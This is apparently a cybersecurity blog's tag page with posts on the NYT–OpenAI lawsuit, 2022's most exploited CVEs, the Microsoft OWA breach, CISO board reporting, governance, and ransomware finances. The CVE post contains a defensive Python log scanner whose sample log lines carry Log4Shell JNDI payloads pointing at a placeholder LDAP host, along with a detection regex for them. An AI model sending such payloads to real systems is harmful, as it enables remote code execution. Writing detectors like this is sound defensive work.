Tag: Tech

  • Will the courts (finally) step in on AI?

    The New York Times vs. OpenAI and Microsoft

    In a groundbreaking legal confrontation, the New York Times has recently filed a copyright infringement lawsuit against OpenAI, the creators of ChatGPT, and Microsoft, a partial owner of OpenAI. This lawsuit delves into the complex and arguably unprecedented issues of copyright law in the age of artificial intelligence. As technology rapidly evolves, so too does the landscape of legal challenges. In his latest post, my friend David Lizerbram explores the intricate details of this case, examining the implications of AI’s use of copyrighted materials without permission and the potential defenses available. Join him as he navigates through the legal intricacies and the broader implications for copyright law in the digital age at New York Times v. OpenAI and Microsoft Copyright Case – David Lizerbram & Associates (lizerbramlaw.com)


    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • 2022 Top Routinely Exploited Vulnerabilities

    Hello, fellow tech enthusiasts and cybersecurity-conscious readers! In the ever-evolving landscape of cybersecurity, staying ahead of potential threats is essential. Every year, new vulnerabilities are discovered, and cybercriminals work tirelessly to exploit them. In 2022, some vulnerabilities took center stage as they were routinely targeted by malicious actors. As we embark on a journey into the fascinating world of cybersecurity, we’ll explore the top routinely exploited vulnerabilities that dominated headlines in 2022. So, grab your favorite beverage, get comfy, and let’s dive into the captivating world of cybersecurity!

    1. Log4Shell (CVE-2021-44228)

    Kicking off our list is the notorious Log4Shell vulnerability. While it first came to light at the end of 2021, its impact rippled into 2022. It affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code; successful exploitation gives the attacker control of the affected application. Thanks to the cybersecurity community’s swift response, patches were released, but it serves as a reminder of the importance of regular updates and monitoring.
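    Monitoring for this class of request is something a defender can automate. The following is an added example, not code from this post or from CISA: it scans web-server access-log lines for the Log4j lookup syntax (`${jndi:`) that Log4Shell exploitation requests carry, percent-decoding each line first so that URL-encoded requests are not missed, and then groups the hits by client address for triage. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not taken from the post). Lines 2 and 3
# carry a Log4j JNDI lookup in a request header and in a query string; line 1
# is ordinary traffic. Addresses use private / documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:03:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:21:04:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.7 - - [10/Dec/2021:21:05:44 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# A Log4j lookup naming the JNDI resolver: "${" followed by "jndi:" before the
# closing brace, matched case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{[^}]*jndi:", re.IGNORECASE)


def normalise(line):
    """Percent-decode a log line so encoded "${" / ":" sequences become visible.

    Decoding is applied twice to also catch double-encoded requests; decoding
    text that contains no %XX sequences is a no-op, so plain lines are unchanged.
    """
    return urllib.parse.unquote(urllib.parse.unquote(line))


def scan_for_jndi_lookups(lines):
    """Return (line_number, client_ip, matched_fragment) for each suspicious line."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        decoded = normalise(raw)
        match = JNDI_LOOKUP.search(decoded)
        if match:
            client_ip = raw.split(" ", 1)[0]  # first token of the combined log format
            fragment = decoded[match.start():match.start() + 60]
            findings.append((lineno, client_ip, fragment))
    return findings


def sources_by_hit_count(findings):
    """Aggregate findings per client IP, most active address first, for triage."""
    counts = {}
    for _, ip, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    hits = scan_for_jndi_lookups(SAMPLE_LOG)
    for lineno, ip, fragment in hits:
        print(f"line {lineno} from {ip}: {fragment}")
    print(sources_by_hit_count(hits))
```

    Run against a real access log by replacing `SAMPLE_LOG` with the file’s lines. A hit only tells you that someone sent the lookup string, not that the request succeeded; the next step is to check whether the receiving application logs user-controlled input through a vulnerable Log4j version and to look for outbound LDAP or RMI connections from that host around the same time.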

    2. CVE-2018-13379

    This vulnerability, affecting Fortinet SSL VPNs, was routinely exploited in both 2021 and 2022. Its continued exploitation indicates that many organizations failed to patch in a timely manner and remain vulnerable to malicious cyber actors.

    3. ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

    These three vulnerabilities, collectively known as ProxyShell, affect Microsoft Exchange email servers and made headlines again in 2022. Chained together, they enable attackers to gain unauthorized access to Exchange servers. Regularly applying security updates from Microsoft is essential to protect your organization from ProxyShell attacks.

    4. CVE-2021-40539

    This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

    5. CVE-2021-26084

    This is an object-graph navigation language (OGNL) injection vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a Confluence Server or Data Center instance.

    6. CVE-2022-22954, CVE-2022-22960

    These vulnerabilities are RCE, privilege escalation, and authentication bypass vulnerabilities in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

    7. CVE-2022-1388

    This is a vulnerability in F5 BIG-IP that could allow unauthenticated threat actors to execute arbitrary system commands, create or delete files, or disable services.

    8. CVE-2022-30190

    This is a remote code execution vulnerability affecting Microsoft Windows Support Diagnostic Tool (MSDT) that could allow a remote, unauthenticated threat actor to take control of the system.

    9. CVE-2022-26134

    This is a remote code execution vulnerability in Atlassian Confluence Data Center and Server. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

    Additional “popular” vulnerabilities

    Among the other often exploited vulnerabilities listed, there are bugs in products from Citrix (CVE-2019-19781), Microsoft (CVE-2017-0199, CVE-2017-11882, CVE-2020-1472, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2022-41082), Ivanti (CVE-2019-11510), SonicWALL (CVE-2021-20021, CVE-2021-20038), Fortinet (CVE-2022-42475, CVE-2022-40684), QNAP (CVE-2022-27593), and other software manufacturers.

    Some of the vulnerabilities in these lists date back to 2017 and 2018 and are still being widely exploited.

    Staying informed about the top routinely exploited vulnerabilities is a fundamental aspect of cybersecurity. By understanding these threats and taking proactive measures, you can protect your systems and data from malicious actors. 

    REMEMBER TO:

    • Keep all software and libraries up to date.
    • Turn on Multi Factor Authentication or Two Factor Authentication.
    • Regularly monitor your systems for suspicious activity.
    • Develop an incident response plan to mitigate potential threats.
    • Use strong passwords and a VPN.
    • Invest in cybersecurity software.
    • Think before you click on links that look a little off.
    • Be aware of common attack methods.

    Cybersecurity is an ongoing process, and by staying vigilant and informed, you can reduce the risk of falling victim to the latest vulnerabilities and attacks in 2022 and beyond. Let’s take this knowledge and use it to build a safer digital world for all of us. Cheers to a more secure and resilient cyber landscape in 2023 and beyond! Stay secure, stay informed!

    References:

    2022 Top Routinely Exploited Vulnerabilities | CISA

    CISA, NSA, FBI, and International Partners Release Joint CSA on Top Routinely Exploited Vulnerabilities of 2022  | CISA

    AA23-215A: 2022’s Top Routinely Exploited Vulnerabilities – Blog | Tenable®

    How to Protect Yourself from Software Vulnerabilities – Blog | Tenable®


  • Microsoft OWA breach

    Today, we’re diving into a topic that has been making headlines recently: the Microsoft Outlook Web App (OWA) breach. I understand that hearing about data breaches can be unsettling, but it’s essential to stay informed and take proactive steps to protect yourself and your information. In this blog post, we’ll break down the Microsoft OWA breach: what happened, what you can do to protect yourself, and why staying informed is crucial in the digital age. Let’s dive in!

    Understanding The Microsoft OWA breach

    So, what exactly happened? Microsoft’s Outlook Web App (OWA) suffered a security breach that had many users concerned about the safety of their emails, attachments, and personal information. The breach occurred due to a vulnerability that allowed unauthorized access to OWA accounts. More recently, Microsoft finally explained the cause of the Azure breach. It stated that the corporate account of one of its engineers was compromised by a highly skilled threat actor, who acquired a signing key that was then used to break into dozens of Azure and Exchange accounts belonging to high-profile users.

    It’s important to note that not every OWA user was affected, but it’s still crucial to take precautions. Microsoft acted swiftly to address the breach and initiated an investigation. They also took measures to secure the affected OWA servers and notified customers whose data may have been compromised. In addition, they recommended that users change their passwords as a precaution.

    How to Protect Yourself

    1. Change Your Password – If you are using OWA or any other Microsoft services, change your password immediately. Make sure that your password is strong and unique, with a combination of letters, numbers, and special characters.
    2. Timely Action – Microsoft acted swiftly to patch the vulnerability and address the breach. If you’re using OWA, make sure that your software is updated to the latest version to ensure that you’re protected.
    3. Enable Multi-Factor Authentication (MFA) – If you haven’t already, enable MFA on your OWA account. This adds an extra layer of security by requiring you to verify your identity through a second method, like a code sent to your phone.
    4. Beware of Phishing Attempts – Stay vigilant against phishing emails or suspicious messages. Cybercriminals often take advantage of these situations to trick users into revealing sensitive information.
    5. Monitor Your Accounts – Regularly check your email and financial accounts for any unusual activity. If you notice something suspicious, report it immediately.
    6. Stay Informed – And last but not least, keep up to date with news and updates from Microsoft regarding the breach. They may release additional information or security recommendations.

    The Microsoft OWA breach may have raised some concerns, but always remember that being aware and taking proactive measures are your best allies in the digital world. By keeping your software updated, using strong passwords, enabling MFA, and staying vigilant, you can reduce the risks associated with such incidents. 

    Don’t let this breach discourage you from using technology – it’s an integral part of our lives.

    Instead, let it serve as a reminder to be proactive and informed about cybersecurity. Together, we can make the digital world a safer place for everyone. Stay safe, stay informed, and keep your digital world secure!

    References:

    https://arstechnica.com/security/2023/09/hack-of-a-microsoft-corporate-account-led-to-azure-breach-by-chinese-hackers/

    Outlook Hack: Microsoft Reveals How a Crash Dump Led to a Major Security Breach (thehackernews.com)

    iTWire – Microsoft says Azure breach ‘probably’ due to account being cracked

    How To Prevent A Data Breach In Your Company (forbes.com)


  • How a CISO needs to present to the board

    As a Chief Information Security Officer (CISO), reporting to the corporate board can be both an opportunity and a challenge. On one hand, it’s an opportunity to educate the board on the current state of the company’s security posture, demonstrate the value of security investments, and gain support for future initiatives. On the other hand, it’s a challenge because the board may not be well-versed in technical security concepts, making it difficult to communicate effectively.

    In order to successfully report to the corporate board, a CISO must approach the task with a clear understanding of the board’s expectations and a well-crafted communication strategy. Here are a few key steps to help you do just that:

    Understand the board’s priorities

    Before you present to the board, take the time to understand their priorities and what they are most concerned about. This will help you tailor your presentation to their specific needs and ensure that the information you provide is relevant and valuable.

    Use clear, concise language

    The board is likely to include individuals who are not technically savvy, so it’s important to use clear, concise language that is easy for everyone to understand. Avoid using technical jargon or acronyms, and instead focus on the key security issues that are most relevant to the company’s operations and reputation.

    Emphasize the impact of security risks

    The board needs to understand the impact of security risks on the company’s bottom line. Highlight the potential financial and reputational damage that can result from a security breach, and make sure to demonstrate the value of investments in security technologies and processes.

    Provide regular, comprehensive updates

    The board should receive regular, comprehensive updates on the state of the company’s security posture. These updates should include information on the most significant security risks facing the company, as well as the measures that have been taken to mitigate those risks.

    Encourage open communication

    Encourage open communication with the board, and be prepared to answer any questions they may have. This will help to build trust and ensure that everyone is on the same page when it comes to security issues.

    Be proactive

    A good CISO is always looking ahead to identify potential security risks and developing strategies to mitigate them. Share your vision for the future with the board, and outline the steps that you are taking to stay ahead of the curve.

    In conclusion, reporting to the corporate board as a CISO is an important responsibility, and requires a well-thought-out communication strategy. By understanding the board’s priorities, using clear language, emphasizing the impact of security risks, providing regular updates, encouraging open communication, and being proactive, you can build a strong relationship with the board and help ensure the success of your company’s security efforts.

  • Are you 100% certain that you are on top of security basics?

    At the siberX CISO Forum Canada, C. Kelley Bissel, CVP of Microsoft Security reported that CISOs are failing to do the basics. He puts a fair amount of blame for these failures on the company CISO.

    “Ninety-eight per cent of attacks are elementary and take advantage of unpatched devices, a lack of multifactor authentication to protect logins, no privileged access controls, no identity management, and password vulnerabilities.”

    C. Kelley Bissel, CVP, Microsoft Security

    First, it’s not all on the CISO

    A strong argument could be made that a CISO in a non-security-centric organization is set up to fail. A CISO’s job is difficult even with the full backing of leadership. Consider implementing MFA alone: many executives will push back on the implementation because it isn’t easy.

    Another point of pushback is access control. I first felt this pushback when I was implementing SOX controls and logging of physical access to the company servers, and it came from the CIO. The CIO was extremely bothered at having to log his access and tried to kill the process as inefficient. The fact is, he didn’t need access 99.96% of the time anyway. He nearly killed the process, which would have led to a possible security exception in an audit. Not a failure of the CISO, but a failure of the organization to allow the necessary security.

    So what are ‘security basics’?

    Mr. Bissel outlines the basics as patching, login protection, access control, identity management, and password strength. Certainly, he was simplifying it for presentation but CIS offers a more comprehensive list that includes 56 “Basics” from 18 different controls in Version 8 of the CIS Critical Security Controls.

    See other blog posts for more information on putting in basic cybersecurity.

    Consider looking into vCISO service providers. Tracc Development (site sponsor) or any number of service organizations would be happy to help. Omni Group Consulting and Triden Group have excellent talent.

  • Compliance on the horizon? Understand your terms now!

    I recently worked on a compliance readiness project to get a company ready for an ISO 27002 audit. I was amazed at how little the organization understood about governance. They were having problems with other compliance as well, even though they were a SOX-compliant entity. Yes, they had pretty written “policies”, but these were clearly designed by the marketing team, had no structure, and mixed in standards, guidelines, and procedures, and even documented the people assigned to do it all.

    ISACA defines internal controls as the policies, procedures, practices and organizational structures designed to provide reasonable assurance that business objectives will be achieved and undesired events will be prevented or detected and corrected.

    ISACA COBIT 5 Framework

    Doing it wrong is even worse than not doing it at all!

    Poorly-scoped documentation often results in governance functions becoming more of a hindrance than a help. An example of inadequate governance documentation is a multi-page policy document that mixes high-level security concepts, configuration requirements, and work assignments. This type of documentation can cause confusion and inefficiencies across technology, cybersecurity, and privacy operations. There are several reasons why this type of documentation is bad, including the fact that it is confusing and people are unlikely to read it, which defeats the purpose of having it in the first place. Additionally, excessively-wordy documentation that explains concepts in great detail can make it difficult to understand exact requirements. If compliance (or certification) is a goal this can lead to gaps, which goes against the goal of being audit-ready.

    Start with the goal in mind

    First, start off with the requirements. If the goal is a certification or compliance, your governance should align to those requirements. If you are already compliant with a framework, find a crosswalk, or mapping, from your framework to the desired framework. This can help focus your efforts and build a plan for what needs to be done.

    For many technologists, words matter. Terms like “policies” and “procedures” are often used interchangeably, but they are not interchangeable. These terms have quite different implications, and those differences should be kept in mind, since the use of improper terminology has cascading effects.

    Also keep in mind that an audit will confirm that policies are being enforced. This means that if a policy says “Bob will update the SSL keys”, what happens if Bob retires? The policy will need to be rewritten! That’s undue work AND it is very likely that it will be forgotten. Another common mistake is to be too specific with tools, such as stating “All servers are to be running Windows Server 2008.” Obviously these policies will not age well. While all policies should be reviewed regularly, little mistakes like these can be overlooked.

    Source: http://www.commoncontrolsframework.com/

    Doing it right

    In the realm of cybersecurity documentation, a strong governance structure is built on a hierarchy of components that work together in an integrated approach to managing requirements. Keep these components distinct and don’t try to address everything in one document! These components include:

    Policy: A high-level statement of management intent that formally establishes requirements to guide decisions and achieve rational outcomes. Policies are enforced by standards and further implemented by procedures, and are often created in response to external influences like statutory, regulatory, or contractual obligations.

    Control Objectives: Targets or desired conditions that are designed to ensure policy intent is met. Control objectives help to establish the necessary scope to address a policy and should be directly linked to an industry-recognized practice, such as statutory, regulatory, or contractual requirements.

    Standard: Formally-established requirements related to processes, actions, and configurations that are finite and quantifiable. Standards satisfy control objectives and exceptions are never made to policies, only to standards. If a standard cannot be met, a compensating control should be implemented to mitigate risk.

    Guidelines: Recommended practices that allow for discretion or leeway in interpretation, implementation, or use. Guidelines are based on industry-recognized practices or cultural norms within an organization and augment standards when discretion is permissible.

    Procedure: A formal method of doing something based on a series of actions conducted in a certain order or manner. Procedures are the responsibility of the asset custodian to build and maintain, in support of standards and policies.

    Together, these components create a comprehensive and effective governance structure for managing cybersecurity requirements.

    For more information on governance and cyber security, check out other articles here.

  • What happens to ransomware money?

    Ransomware is a type of malicious software that encrypts a victim’s files. The attackers then demand payment in exchange for the decryption key, typically in the form of cryptocurrency, like Bitcoin, because it is easier to make the exchange anonymous. In recent years, ransomware attacks have become an increasingly common form of cybercrime, and the attackers behind them have been able to generate significant amounts of money. But what happens to all of that ransom money? Where does it go and how is it used?

    The vast majority of ransomware payments make their way to Eastern Europe and the former Soviet Union. These regions have become hubs for cybercrime due to the high level of technical expertise and the relative ease with which criminal operations can be conducted there. This begs the question of how close these criminal organizations are to nation states. While Western governments are careful about blaming other nations for such attacks, it is clear that interests are aligned. Western states have noticed an increase in cybercrime activity against them for their support of Ukraine over the last year, clearly an indication of a link in ideologies at the least. It should be noted that North Korea is even more clearly in the cybercrime game and uses funds from ransomware payments to directly finance the regime.

    Once the ransom money has been converted into more liquid forms (local currency), it can be used for a variety of purposes. Some of the ransom money is used to fund the attacker’s lifestyle, including expensive cars, luxury vacations, and high-end real estate. Other money is invested in other criminal operations or laundered through various financial institutions to make it appear as legitimate income.

    While Hollywood likes to portray “hackers” as reserved types in hoodies sitting alone in a dark room, ransomware attacks are often carried out by organized crime syndicates. These organizations are extremely well connected and as well organized as any Fortune 500 company. As with any corporation, part of the revenue goes back into product development: funding the development and distribution of new malware, the creation of botnets, and the purchase of stolen data on the dark web. This money can also be used to bribe law enforcement or government officials, allowing the attackers to operate with impunity.

    The flow of ransomware money is complex and multifaceted, and it is difficult to determine exactly where it all goes. Some of it is used to fund the attackers’ lifestyles, while some is invested into developing new and more complex attacks.  Some attacks may directly or indirectly prop up nations.

    If hit with ransomware, each company and individual must weigh the cost of rebuilding their systems and data against paying the ransom. However, that is a simplistic view of the equation. With the rise of corporate social responsibility, paying a ransom to restore services must also consider what the ransom proceeds may support.

  • Why boards need to be paying attention to cybersecurity now

    Contrary to popular belief, cybersecurity is not an operations issue! Cybersecurity is frightening, and boards love to disassociate from it by calling it “operational” and thus not their responsibility. However, it is a critical issue for the whole organization, and the legal requirements for corporate boards to pay attention to it are growing. With increasing numbers of data breaches and cyber-attacks, the legal landscape is rapidly evolving to protect both organizations and their customers from the consequences of these events. Here are a few key legal requirements that corporate boards should be aware of when it comes to cybersecurity:

    • Data protection laws: Many countries have enacted data protection laws, such as the European Union’s General Data Protection Regulation (GDPR), that require organizations to take appropriate measures to protect the personal data of their customers and employees. This includes implementing technical and organizational measures to prevent unauthorized access to personal data, and ensuring that the company has a process in place for responding to data breaches.
    • Cybersecurity regulations: Some industries, such as finance and healthcare, have specific cybersecurity regulations that companies must abide by. These regulations can include requirements for regular risk assessments, incident response plans, and the implementation of security technologies.
    • Contractual obligations: Companies often have contractual obligations to their customers and partners to protect the data they are entrusted with. Failing to meet these obligations can result in financial and reputational damage, and may even lead to legal liability.
    • Corporate governance laws: In many countries, corporate boards have a fiduciary duty to ensure that the company is managed in the best interests of its shareholders. This includes taking steps to protect the company’s assets and data from cyber threats.
    • Tort law: Companies can also face legal liability under tort law if they fail to take reasonable steps to protect their customers’ data. This can include negligence, breach of contract, and misrepresentation claims.

    Corporate boards must be aware of the growing legal requirements around cybersecurity. Failure to meet these requirements can result in legal liability, financial losses, and reputational damage. By staying informed about the latest laws and regulations, conducting regular risk assessments, and implementing appropriate security measures, corporate boards can help ensure that their organizations are protected from cyber threats and meet their legal obligations. I outlined a number of items a board should be doing in my post on corporate boards: The role of the corporate board in cybersecurity – Paul Bergman

  • FBI app helps get missing child info out

    If you are like me, this is something you really don’t want to think about. I would imagine that a missing child is the most terrifying thing possible for a parent. As I sit down to write this, I wonder if this is even something I want to bring up. But being prepared, even for the unthinkable, is important.

    The FBI has an app that allows you to store photos and vital information about your children.

    The Child ID app—the first mobile application created by the FBI—provides a convenient place to electronically store photos and vital information about your children on your smartphone (note: no information is stored or collected by the FBI). In the event your child goes missing, users can show the pictures and provide physical identifiers such as height and weight to security or police officers on the spot. Using a special tab on the app, users can also quickly and easily e-mail the information to authorities.

    The app also includes tips on keeping children safe, as well as specific guidance on what to do in those first few crucial hours after a child goes missing.

    An important note from the FBI site: The FBI is not collecting or storing any photos or information that you enter in the app. All data resides solely on your mobile device unless you need to send it to authorities. Please read your mobile provider’s terms of service for information about the security of applications stored on your device.

  • What is Cybersecurity?

    Cybersecurity is the practice of protecting internet-connected systems, including hardware, software, and data, from attack, damage, or unauthorized access. In today’s digital age, cybersecurity is more important than ever, as more and more of our personal and professional lives take place online.

    One of the most common forms of cyber attack is the hacking of personal and business websites. Hackers use a variety of methods to gain access to these sites, including exploiting vulnerabilities in the site’s code, phishing scams, and social engineering. Once they have access, they can steal sensitive information such as login credentials, financial data, and personal information.

    Another common form of cyber-attack is the spread of malware, which is short for “malicious software.” Malware is any software that is designed to harm a computer system. This can include viruses, trojans, and spyware, which can cause damage or steal information from the infected system.

    To protect against cyber attacks, individuals and businesses should take steps to secure their online presence. This includes using strong passwords and two-factor authentication (see my article on DUO), keeping software and operating systems up to date, and being cautious when opening email attachments or clicking on links.

    Businesses should also have a cybersecurity plan in place, which should include regular security assessments, employee training on how to identify and prevent cyber attacks, and incident response plans in case of a security breach.

    There are also a number of cybersecurity technologies and services available to help protect against cyber-attacks. These include firewalls, antivirus software, intrusion detection and prevention systems, and virtual private networks (VPNs).

    Overall, cybersecurity is a vital aspect of the modern world, and it is important for individuals and businesses to take the necessary steps to protect themselves from cyber-attacks. By staying informed and taking proactive measures, we can help to keep our online lives safe and secure.